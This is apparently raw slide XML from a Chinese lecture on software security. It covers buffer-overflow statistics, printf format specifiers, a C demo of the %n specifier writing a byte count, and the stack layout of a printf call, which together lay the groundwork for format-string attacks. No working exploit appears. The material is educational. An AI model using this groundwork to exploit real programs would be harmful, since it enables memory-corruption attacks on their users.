              <a:t>缓冲区溢出攻击占了远程网络攻击的绝大多数，操作系统中超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>50%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的安全漏洞都是由内存溢出引起的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 任何平台、任何程序都可能存在缓冲区溢出的漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lincoln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>实验室用来评估入侵检测的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>种远程攻击中，有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>种是缓冲区溢出。而在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>份建议中，有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>份是是与缓冲区溢出有关的，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>年，至少有半数的建议是和缓冲区溢出有关的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="26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3891">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293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3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3891">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293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3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3891">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293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38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91C933FA-CFE1-4427-8C07-5631BC123B6B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78852" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1268413"/>
            <a:ext cx="7772400" cy="4675187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>语言中，当编译并运行这个程序向屏幕打印“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Hello, World!”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>并不是简单的向屏幕输出字符串。和相关的程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>fprintf(),vprintf() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>sprintf()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等一样，就想在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后面加上“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>f”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，这些实际上是打印格式。格式化部分允许程序员控制显示文本的样式。可以通过代替特殊的格式字符来显示值或数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="826834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4EF6BE4B-7253-4D69-B48F-75FD0E80D878}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1125538"/>
            <a:ext cx="7772400" cy="4818062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>要显示整型的变量“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>dVal”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>的值，就可以使用下面的格式化字符：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>printf(“The value is %d”,dVal);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>打印的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>就被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>dVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>的值所代替。如果程序员想用十六进制显示同样值：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>printf(“The value in decimal is %d and in hexadecimal is %x”,dVal,dVal); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1176442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9781889D-A603-41BF-8A1C-C94DAFC977E6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="292867" name="Group 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1042988" y="908050"/>
          <a:ext cx="7772400" cy="548640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参数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输出类型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十进制整数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无符号十进制整数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十六进制整数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字符串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地址指针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%f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十进制 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>float or double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到目前为止，已写的个数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52930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631F6B58-BEAE-4240-84CF-013BC76B8B0E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="908050"/>
            <a:ext cx="7772400" cy="5400675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>1. #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>2. int main()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>3. {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>4.    int bytes_formatted=0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>5.    char buffer[28]=”ABCDEFGHIJKLMNOPQRSTUVWXYZ”;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>6.    printf(“%20x%n”,buffer,&amp;bytes_formatted);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>7.    printf(“\nThe number of bytes formatted in the previous printf statement was %d\n”,bytes_formatted);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>8.    return 0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>9.  }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>编译后输出显示为：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>0000000000000012ff64 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>The number of bytes formatted in the previous printf statement was 20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1821890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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>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CBDF00B4-5F8B-4090-BB14-90AB29DAE0A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>调用的堆栈情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1628775"/>
            <a:ext cx="4024312" cy="4249738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>（”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>A is %d and is at %08x. B is %d and is at %08x.\n”,A,&amp;A,B,&amp;B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="294916" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4652963" y="1628775"/>
          <a:ext cx="4024312" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4024312">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>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格式化字符串的地址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A</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的值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A</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的地址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B</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的值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B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的地址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pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>栈底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286941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C2A2DCD0-005F-4AF1-855D-51064AD44A86}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
